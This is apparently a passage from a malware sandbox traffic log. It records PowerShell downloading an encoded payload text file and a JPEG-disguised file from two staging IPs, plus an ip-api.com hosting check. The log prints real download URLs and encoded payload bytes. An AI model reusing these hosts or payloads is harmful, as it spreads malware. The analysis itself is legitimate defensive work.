                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J9x$,i${`ULP)`H
                  Jul 5, 2024 07:26:36.578064919 CEST1236INData Raw: 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b b4 fb 7b e5 4e ea e7 e9 9c e2 80 6d dc f4 19 0a cc c4 06 1c fb e0 58 6d ae 32 43 06 53 84 28 94 2b 83 ed ef 90 22 5d 84 b3 6d a3 80 ac bf 8c 65 97 fe f4 fc b2 48 52 38
                  Data Ascii: o9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:{+i$([U&eRcB;||G`9>a^fg~
                  Jul 5, 2024 07:26:36.578077078 CEST1236INData Raw: 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a
                  Data Ascii: dwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`C<jSYKar5=BI#2H+zc,0
                  Jul 5, 2024 07:26:36.578253031 CEST672INData Raw: eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f
                  Data Ascii: ?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}i@{4[^
                  Jul 5, 2024 07:26:36.578269005 CEST1236INData Raw: 51 a4 92 54 55 a2 4e e3 c0 03 ae 05 fc 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07
                  Data Ascii: QTUNfmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t
                  Jul 5, 2024 07:26:36.578279018 CEST224INData Raw: e3 24 20 62 c1 9d 58 d0 3d 86 66 34 cb 13 04 40 08 04 5d 12 30 90 ea 1d 24 2e 50 b0 16 30 1a 9e 71 36 a2 42 d4 40 ad a0 0e 9c 73 93 11 10 b0 60 41 24 71 66 ab 15 14 c3 cc 0e 49 66 26 a8 f1 f0 ce 77 52 05 35 b0 c0 3c 5a a9 3c d2 cf c5 9a dc 14 f2
                  Data Ascii: $ bX=f4@]0$.P0q6B@s`A$qfIf&wR5<Z<1iTpU-wbZ([d]#e6yi%@#`^v<^5)*AbDpfcey!:q.${:y<;Y{X7m%-,?C6
                  Jul 5, 2024 07:26:36.657366991 CEST1236INData Raw: d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2
                  Data Ascii: (GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\ohWJn;R[kV{@w:e
                  Jul 5, 2024 07:26:36.657388926 CEST224INData Raw: 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f fe 2c 0f 35 f6 17 55 e1 f0 f8 1f 8e a3 c5 a9 fb d7 91 14 b3 6a 52 98 47 1a ea 22 04 2a 81 7b b9 dd 77 fc 39 3f 6a a2 1a 5f da b6 a9 c4 ec 00 f1 15 94 48 14 8d b6 ca df
                  Data Ascii: ?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5
                  Jul 5, 2024 07:26:36.657396078 CEST1236INData Raw: 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94
                  Data Ascii: zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[
                  Jul 5, 2024 07:26:36.657524109 CEST1236INData Raw: 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18
                  Data Ascii: MX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                  Jul 5, 2024 07:26:36.657533884 CEST1236INData Raw: 34 ec ad 09 0a f0 12 e0 7a 55 89 bf 5d 30 f4 9e 41 1c 67 9c f1 bf b4 7a 2f 17 d4 2e 9a 1d 39 8e 2f 26 49 89 0c c4 b6 d5 62 43 0d c4 8b db 42 8f 43 ef c6 63 ea 7c 67 5d 37 86 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63
                  Data Ascii: 4zU]0Agz/.9/&IbCBCc|g]7:9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.2249171208.95.112.1803200C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:36.374907017 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:36.846546888 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:36 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 53
                  X-Rl: 42
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 07:26:37.055036068 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:36 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 53
                  X-Rl: 42
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.2249172198.46.178.144801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:38.661554098 CEST88OUTGET /madamwebbbbbbbas6444.txt HTTP/1.1
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:39.149332047 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Tue, 02 Jul 2024 09:00:11 GMT
                  Accept-Ranges: bytes
                  ETag: "96b1143f5eccda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:39 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 5, 2024 07:26:39.149348021 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                  Jul 5, 2024 07:26:39.149357080 CEST1236INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                  Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                  Jul 5, 2024 07:26:39.149482012 CEST672INData Raw: 45 46 30 52 43 4a 77 65 67 53 67 77 42 52 63 51 42 64 45 41 41 46 6f 51 64 52 45 41 41 46 67 51 42 64 30 67 41 41 59 41 43 46 30 42 44 43 41 67 42 49 55 51 48 4c 49 41 41 47 67 51 42 64 63 67 41 41 59 77 41 64 4d 51 48 59 48 59 45 44 63 51 43 63
                  Data Ascii: EF0RCJwegSgwBRcQBdEAAFoQdREAAFgQBd0gAAYACF0BDCAgBIUQHLIAAGgQBdcgAAYwAdMQHYHYEDcQCcwhDOMAAGESECEAIFgQIRQegSkQBdkQCgHoEIcAEIgQHSMwBGgQIRQegSgQBdggBHwACdIhAHUACRJRFDKxAHgACIUQHBMAIHgQUSUQHVMoEEcgC9LoEBCoERJRADAyCtLYERMYERMYEBMAIMUIgSAAAFkvgSYABKk
                  Jul 5, 2024 07:26:39.149493933 CEST1236INData Raw: 67 53 55 42 41 67 6b 51 73 43 4b 52 41 6c 46 6f 45 56 67 51 73 43 4b 52 41 4b 55 51 75 43 4b 42 41 65 45 51 5a 42 4b 52 46 42 45 41 45 4e 67 51 73 43 4b 52 41 31 4b 6f 45 56 41 63 67 52 34 51 73 43 4b 52 4f 42 4b 52 72 43 4b 78 42 48 67 42 43 4f
                  Data Ascii: gSUBAgkQsCKRAlFoEVgQsCKRAKUQuCKBAeEQZBKRFBEAENgQsCKRA1KoEVAcgR4QsCKROBKRrCKxBHgBCO0hDdMwBHgACF0RBdIRBHkACO4wAHUACOkQCJUwBHgAAe0BCIgQBHkQoCKRnCGhDFMAAKkpgSAAAFggDIUQHEcwBIgBCF0RAEAACOUXEBAQBIgZgS4QBdgQBdESEF0RBdogCHMhCKkYgSoQiBKRAFAADIUQHKgABHc
                  Jul 5, 2024 07:26:39.149610996 CEST1236INData Raw: 42 53 67 41 43 49 4d 77 42 46 67 41 43 49 34 51 41 4e 4a 52 46 45 63 67 43 49 55 51 48 4b 49 41 41 47 67 41 43 49 67 41 43 49 49 41 43 46 30 52 43 48 77 41 43 49 67 77 43 45 63 67 42 49 55 51 48 68 49 6f 45 46 30 42 42 48 6f 51 64 43 47 52 64 43
                  Data Ascii: BSgACIMwBFgACI4QANJRFEcgCIUQHKIAAGgACIgACIIACF0RCHwACIgwCEcgBIUQHhIoEF0BBHoQdCGRdCGBCCAQCJGoEBEAAGgACIUQHEcwBI4gDCEWEVEQ4AGRFO4gDCEWEVQwBVAgHdEQABAxBRJBAgQgDhIoEBAgBFEQTSURBO4ACIgACI4QHIgACO4ACIEngSUQANJRFRcgGIMQHD0xAdggDdggDOkwBPAgHBoABc4QAgQ
                  Jul 5, 2024 07:26:39.149622917 CEST1236INData Raw: 45 4f 34 51 70 42 4b 68 44 6c 47 6f 45 41 46 6f 45 42 30 6b 45 56 73 77 42 67 6b 6c 67 53 41 41 41 46 67 51 6c 42 4b 52 51 43 4b 52 47 53 45 64 67 53 55 51 48 5a 4a 6f 45 4f 67 77 42 55 41 52 67 53 45 51 34 41 47 52 46 49 41 52 67 53 45 51 54 53
                  Data Ascii: EO4QpBKhDlGoEAFoEB0kEVswBgklgSAAAFgQlBKRQCKRGSEdgSUQHZJoEOgwBUARgSEQ4AGRFIARgSEQTSUxBQEoEB0kEVEgCJgAEBKRAhDYEVAUgSEQTSUBEBKBEBKRANJRFMFoEOUQHO4AQBKRANJRFLcwKMEoEBEOgRUBCMEoEB0kEVcADBKRANJRFOIQYRUBDBMBATIQYRUBAgoADBKRANJRFOIQVCGRFNEwEAMhAVJYEVA
                  Jul 5, 2024 07:26:39.149633884 CEST1236INData Raw: 45 43 49 41 41 48 67 77 41 64 4d 51 48 49 34 51 48 4f 30 42 43 4f 30 42 43 4f 30 42 43 6c 47 6f 45 64 55 61 67 53 30 68 44 4f 34 51 48 41 46 6f 45 4f 55 61 67 53 34 51 70 42 4b 68 44 6c 47 6f 45 5a 49 6f 45 6c 47 6f 45 64 34 41 51 42 4b 52 41 4e
                  Data Ascii: ECIAAHgwAdMQHI4QHO0BCO0BCO0BClGoEdUagS0hDO4QHAFoEOUagS4QpBKhDlGoEZIoElGoEd4AQBKRANJRFbcQPc4gDcMAAGggDBEOgRUBCO0BQBKRANJRFAFoEAFoEOAVgS4gDO4gDB0kEV4AQBKRANJRFQcgLIgQBdgABHcACI4QBdgwAIgACIUQHOwwBQgwAdMQHD0xAdggDdAUgS4QHO4gDO0hDO0BCO0hDAFoEB0kEVM
                  Jul 5, 2024 07:26:39.149645090 CEST1236INData Raw: 42 42 6f 77 41 43 34 51 70 42 4b 68 41 67 63 41 43 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 51 42 64 55 51 48 4f 55 61 67 53 34 67 44 64 55 61 67 53 41 55 67 53 45 51 54 53 55 68 44 48 59 43 43 49 34 51 48 49 34 51 48 4f 30 68 44 4f
                  Data Ascii: BBowAC4QpBKhAgcACI4QHAFoEB0kEVAUgS4QBdUQHOUagS4gDdUagSAUgSEQTSUhDHYCCI4QHI4QHO0hDO4QANJRFO0hCHQBCOUgAAUACIggDEcgBO0fgSEAIGkfgSAAIFgQ9BKRAgYQ8BKBAgUAC5JR+BKBCO0BQBKR9BKR8BKR7BKhDAFoEB0kEVswBfgACO0xAd4gDd4AUBKhDAFoEB0kEVowBXwBHOIAAFgwABACBIgQBdU
                  Jul 5, 2024 07:26:39.149657011 CEST1236INData Raw: 48 46 30 52 42 64 4d 41 41 4b 67 51 42 64 55 51 48 44 63 77 42 49 41 55 67 53 67 67 44 64 34 41 51 42 4b 52 41 4e 4a 52 46 4f 63 77 42 53 67 67 44 42 41 43 42 49 41 55 67 53 45 51 54 53 55 68 44 4f 34 51 42 48 30 51 65 42 47 68 44 4f 34 51 48 44
                  Data Ascii: HF0RBdMAAKgQBdUQHDcwBIAUgSggDd4AQBKRANJRFOcwBSggDBACBIAUgSEQTSUhDO4QBH0QeBGhDO4QHDAQCxFYEOEAAGgACO0BQBKRANJRFO4gDHcAEAMRATEAIGAwECEAIFklEIEAAFEwEAMRACAyBOESEC0lEVcQaBKBAgUQbBKBAAUACYAUgSEQTSUhDhEhAdJRFAFoEO4gDY0PgSwR/AKBGY0PgSgR/AKRIR0PgSgBHIg
                  Jul 5, 2024 07:26:39.154484987 CEST1236INData Raw: 45 41 41 41 42 4a 44 59 45 42 45 41 41 47 67 51 41 48 4d 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 45 41 44 41 41 41 41 41 41 51 41 41 41 41 41 44 41 51 41 4d 30 4c 67 52 6b 4c 67 52 45 67 41 67 6b 41 41 41 45 6d 4e 30 4d 47 4d 31 45 32 4e 6c
                  Data Ascii: EAAABJDYEBEAAGgQAHMAAAAAAAIAAAAwAAEADAAAAAAQAAAAADAQAM0LgRkLgREgAgkAAAEmN0MGM1E2NlN2M50SY1ATOtQDO0QTLmR2Nj1iZhJDZzMTNzQCABkCAAAjLw4CMuEzBAEADBM3dvJHaU52bpRHclNGeF52bOBXYydlFCQFABAQAeAAAAAAAIAQAIAlgRYABMJYEGQASCGhBEQkgRYABAJYEGQAPCGhBEgjgRYABI4


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.224917391.92.254.194801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:39.628257990 CEST83OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:40.310273886 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:40 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                  Jul 5, 2024 07:26:40.310431957 CEST224INData Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b
                  Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQ
                  Jul 5, 2024 07:26:40.310441971 CEST1236INData Raw: f7 72 19 58 8b 1d 70 91 49 4a 19 fa 9c ed 49 90 3a 84 7b de 2b e5 80 a4 69 24 84 28 5b 55 26 b1 97 89 c4 65 9c 52 a8 e0 63 10 ed 81 42 05 dc 3b 9f 7c 99 7c c4 47 60 39 ae 3e 18 09 92 b1 ed 61 5e 66 f6 f4 9e c0 67 e8 ef b0 7e 20 66 fd 90 f8 2f 84
                  Data Ascii: rXpIJI:{+i$([U&eRcB;||G`9>a^fg~ f/|Dt?Rsbo;if3fe~<().\U~n;T?WLYW,V;t?7 X~al{2&y!S4pjV3JEP JIw$8
                  Jul 5, 2024 07:26:40.310451031 CEST224INData Raw: 17 e0 30 21 17 5c 80 44 59 58 aa 8a 05 ba 0c ed 60 f1 08 e0 43 3c 8a d1 83 6a 01 53 59 0b 04 b2 4b 61 f7 1b a0 72 35 ba 3d 42 c9 02 49 23 32 48 2b e0 0d e0 7a 7f d9 b2 ea a7 fb 63 e1 d2 19 14 e9 d5 a5 2c bb 85 9f dd 30 e9 9f 5e d2 f8 5e 87 c3 c6
                  Data Ascii: 0!\DYX`C<jSYKar5=BI#2H+zc,0^^AHq7[GWu:xR_2P00u>!%gj_YtVR, \^3x-Yb>?hF`ms0~~".C7mW4
                  Jul 5, 2024 07:26:40.310466051 CEST1236INData Raw: f1 66 67 70 d4 db be e8 a1 7e 34 c3 71 cb f8 33 b7 ff 00 75 6f 1f 9d 1a 80 d3 22 15 3d f8 8f 9f a6 d3 8b eb 75 25 3e dc 47 1b 10 37 f8 ae fd ec 3d 5f fd 8a 82 af a5 7a b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31
                  Data Ascii: fgp~4q3uo"=u%>G7=_z0bxxZx|{e1fV>).#k]};~,H<+=h,bP=F[8k|"t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8h
                  Jul 5, 2024 07:26:40.310475111 CEST1236INData Raw: aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f
                  Data Ascii: S3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h6gy{,i%{{V{<cc@QgT+aaAj5:e[2<uHUYN61UnZ
                  Jul 5, 2024 07:26:40.310486078 CEST448INData Raw: fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70
                  Data Ascii: o|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3:l[;Q<*H"Vue?<jOE'>Ir.t(H'l`Y,JV'-*a,Y0:WvumCm`hskRC06f@
